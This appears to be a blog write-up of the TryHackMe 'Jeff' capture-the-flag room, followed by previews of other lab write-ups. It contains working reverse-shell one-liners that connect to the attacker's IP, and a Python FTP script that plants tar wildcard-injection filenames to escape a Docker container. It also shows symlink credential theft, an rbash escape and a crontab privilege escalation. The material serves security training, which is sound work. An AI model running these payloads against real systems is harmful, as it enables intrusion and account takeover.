Jeff write-up THM

-
Hello there fellow hacker, today I'll be attempting to walk you through a fairly difficult room called Jeff on tryhackme.com created by JB7815

The key things that I learned from this room are:-
  • Subdomain enumeration
  • Escaping docker with a custom python script that performs wildcard exploitation
  • Exploiting a binary with symbolic link
  • Escaping rbash
  • And exploiting crontab, so let's get started
Before beginning our hacking, it's always a good practice to add the IP address to your /etc/hosts file


#Foothold:-

First step as usual we will begin with an nmap scan,

nmap -sC -sV <Machine IP> -oN nmapscans
-sC :- runs a script scan
-sV :- tells the version of the services running on the box
-oN:- saves the output of the scan

Looks like we only have 2 ports open:-

PORT   STATE    SERVICE
22        open        ssh  
80        open        http

Let's check out what port 80 has to offer,

Ok, so jeff has a portfolio page running on port 80, let's use gobuster to find out what other directories this webserver has,

gobuster dir -u http://<machine IP>/ -w <wordlist>

dir :- is to tell gobuster to use directory mode
-u :- is used to specify URL that we want to enumerate
-w :- is used to specify the wordlist we want to use,

We found some directories, lets see what they have,
Looks like we can upload files here,

But unfortunately this is a rabbit-hole, because we don't know where the uploaded files are being stored, So let's move on

/admin, /backups were just empty pages and /assets was a 403 forbidden,

Now what we can try is recursive directory busting, you can automate this using dirbuster, but i like to do it manually using gobuster,

On enumerating /admin directory I found,

/login.php again was just empty.

So let's move on to /backups, where we found a zip file.
.
Let's download it and see what it has.
This zip file is password protected, so we'll use a tool called fcrackzip, to bruteforce the password

fcrackzip -D -p <wordlist> <filename>

Looks like we got the pass for the zip, now let's open and see if we can find anything interesting,

wpadmin.bak looks pretty interesting to me,

voila we found a password for wordpress!

But while directory enumeration, we didn't find any wordpress pages,

So, what we'll do now is perform a subdomain scan using gobuster,

gobuster vhost -u <url> -w <wordlist>

For this scan I used SecLists/Discovery/DNS/namelist.txt,

we found wordpress.jeff.thm!!

let's add this to our hosts file,
On visiting wordpress homepage,
let's login with the credentials we found in the wpadmin.bak with user jeff,

Now that we are in, we can work on getting a reverse-shell.

After attempting a lot of different reverse-shell codes, the one that worked for me was a bash one-liner wrapped around php :-

exec("/bin/bash -c 'bash -i >& /dev/tcp/<Your local IP>/port number 0>&1'")

I threw this code in the askimet plugin editor and activated the plugin,
And ran a netcat listener on my local machine to get a shell back,


nc -lnvp <port number>

So we received a shell back as the user www-data, this ends our Foothold phase, now onto getting a user privilege,

#Grabbing User privilegs:-

My methodology after establishing a foothold on the target machine is to enumerate the machine internally using linpeas, so let's begin:-

So i moved into the /tmp folder on the target machine,

You can start an http server on your local machine using python3 and send linpeas to the target machine,

python3 -m http.server 8000

Now to download linpeas we use wget on the target machine:-

wget http://<your local machine IP>:8000/linpeas.sh

to execute linpeas we have to change the permissions of the script,
Give some time for linpeas to enumerate the machine,

There's an interesting find, looks like we are in a docker container,

Also we have this really interesting file in html folder called ftp_backup.php,
Let's try to understand it:-
Ok, so this is were interesting stuff begins.

By reading this code what I understood is that,
  • We have credentials of the ftp server that we have to connect to in order to escape the docker container
  • We can only connect to the ftp server internally, i.e. from the target machine.
  • The backup.sql file is processed outside the container,
What I did after seeing and processing this code is created my own custom python script using ftplib module, I will try to explain it to you about the functions that are being used in this script and their working:-


#!/usr/bin/env python3.7
from ftplib import FTP
import io

host = '172.20.0.1'
username = "backupmgr"
password = "**************"

ftp = FTP(host = host)
login_status = ftp.login(user = username,passwd = password)
print(login_status)
ftp.set_pasv(False)
ftp.cwd('files')
print(ftp.dir())

shell = io.BytesIO(b'python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.9.161",9002));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);')
trash = io.BytesIO(b'')

ftp.storlines('STOR shell.sh',shell)
ftp.storlines('STOR --checkpoint=1',trash)
ftp.storlines('STOR --checkpoint-action=exec=sh shell.sh,trash)
ftp.dir()

ftp.quit()

  • FTP(): This function allows us to specify the host we want to connect to.
  • ftp.login(): This function allows us to specify a user name and password to Login to the FT server.
  • ftp.set_pasv(): If the argument in this function is set False ftp will run in active mode, which is necessary for us as passive mode doesn't work on this machine.
  • ftp.cwd(): This will set the current directory to "files".
  • ftp.dir(): Will print out the list of directories on the server.
  • io.BytesIO(): is used to create our file to store on the ftp server, we will create two file here, the first file will contain our shell code and the second file will be an empty file.
  • ftp.storlines(): This will allow us to store file in ASCII transfer mode, we can pass a command and a file as arguments for this function
  • ftp.quit(): This will close the ftp server.
I know it's a lot to read but trust me, it's worth it.

Why this code is working?

There is a crontab running outside the container, user backupmgr is running tar every few minutes, tar uses a wildcard, " * "  that will add everything in the directory ftp://files.

This usage of wildcard by tar is pretty dangerous in general, which will allow us to exploit it.

--checkpoint=1 
--checkpoint-action=exec=sh shell.sh,trash

These 2 commands are interpreted as arguments of tar, hence the tar command will run our shell,

All we have to do is start a netcat listener on our local machine

To get a detailed understanding of wildcard exploitation and ftplib module i used the following resources:-
After creating the script all we need to do is start a python3 http server and send our script to the target machine,

We have a successful login

python3.7 was installed on the machine instead of python3 so we had to use that.

Ok, after a long struggle, we're finally out of the container, 

On exploring the machine a bit I found that we have a user Jeff, so let's get his privileges.

find / -user jeff 2>/dev/null

This command allowed me to find all the files that belonged to the user jeff.

jeff.bak looks like a file that might have some credentials stored in it, but we don't have permissions to read it so let's see something else.

Looks like /opt/systools folder has something:-

Ok so message.txt has read permissions all the way, but it doesn't have any data that will help us,
Whereas the for the binary systool we have executable permissions,

Let's use ltrace to see what is happening with systools,

ltrace shows us that on running systools and choosing option 2, message.txt file will be read always,

Now to exploit this binary and get credentials from jeff.bak, I deleted the current message.txt file and created a symbolic link with the /var/backups/jeff.bak.

ln -s /var/backups/jeff.bak message.txt

Now let's run systool and see what information we can get from jeff.bak.
Yeaa, we found the credentials for jeff, now let's switch user using su jeff.


We logged in as user Jeff, but we are still in a restricted bash,

To escape rbash I used the following commands:-

vi
:set shell=/bin/bash
:shell

Now we can grab the user.txt file.

#Getting Root:-

I know all this escaping has made you tired, trust me it wasn't a joyful for me either, so I'll try to make this privilege escalation fairly simple.

After getting jeff's privileges I did a:-

sudo -l
So, we can run crontab with sudo, I immediately jumped to gtfobins and found out that we can use 

sudo crontab -e

And escalate our privileges,

On running this command vi is opened, which made me want to die!
But a bit googling saved me the trouble, so in order to get root from vi I used:-

:!/bin/bash

And we have root!!!

All in all this box was pretty fun and introduced me to a lot of new concepts that I wasn't familiar with.

Hope you guys learned from this box as much as I did!!!!


Comments

Post a Comment

Popular posts from this blog

Blog write-up THM

-
Image
Another week, another write-up Blog is a medium difficulty room created by Nameless0ne on tryhackme.com :- https://tryhackme.com/room/blog I'll try my best to explain about all the tools and methodologies, The goal of this room is to teach:- Wordpress Enumeration Gaining a shell using a unique vulnerability for a specific Wordpress version Getting root privileges using a very creative vulnerability So let's get started. So, after starting up the room, the first thing we always do is to run an nmap scan to see all the open ports and services running on the machine. nmap -sC -sV <machine-IP> -oN nmapscan -sC:- is used for a script scan -sV:- Shows us the version of all the services running -oN:- stores the result in a file with .nmap format And by the result we can see:- PORT     STATE      SERVICE 22           open          ssh          80      ...
Read more

Daily Bugle Write up

-
Image
Hello fellow hacker, today I'm going to help you solve the machine Daily bugle on TryHackMe:- https://tryhackme.com/room/dailybugle So let's begin. The main objectives of this machine is to:- Compromise joomla CMS via SQL injection vulnerability Cracking hash using a tool called john the ripper. And taking advantage of a b inary called 'yum' that allowed for privilege escalation # First step we begin by running an nmap scan against the target machine:- nmap -sC -sV <target-machine-IP> -oN nmapscans -sC :- this tag runs a script scan on target machine -sV :- this tag detects services and versions of services running on the machine -oN :- this tag allows us to save the result for future reading. As the result shows there's:- PORT       STATE SERVICE ------------------------------------------ 22/tcp       open     ssh 80/tcp       open     http 3306 /tcp   open   ...
Read more

Undiscovered Write-up THM

-
Image
 Hello fellow hackers, I am back with another write-up for you all so let's get started.  Today we are doing Undiscovered box on tryhackme.com created by ch4rm .  The topics we are going to cover are:- Virtual hosts enumeration CMS bruteforcing Getting reverse-shell using an exploit from exploit-db Mounting file system and accessing data of victim machine on our local machine Horizontal privilege escalation using a script on victim machine And finally privilege escalation using vim.basic capabilities So let's get started, Virtual Hosts Enumeration As our general methodology goes, we'll start with an nmap scan # Nmap 7.80 scan initiated Tue Nov 10 01:56:45 2020 as: nmap -sC -sV -oN nmapscans 10.10.122.39 Nmap scan report for undiscovered . thm ( 10.10 . 122.39 ) Host is up ( 0.40 s latency) . Not shown: 996 closed ports PORT STATE SERVICE VERSION 22 / tcp open ssh OpenSSH 7.2 p2 Ubuntu 4 ubuntu2 . 10 (Ubuntu Linux; protocol 2.0 ) | ssh - hostkey: | ...
Read more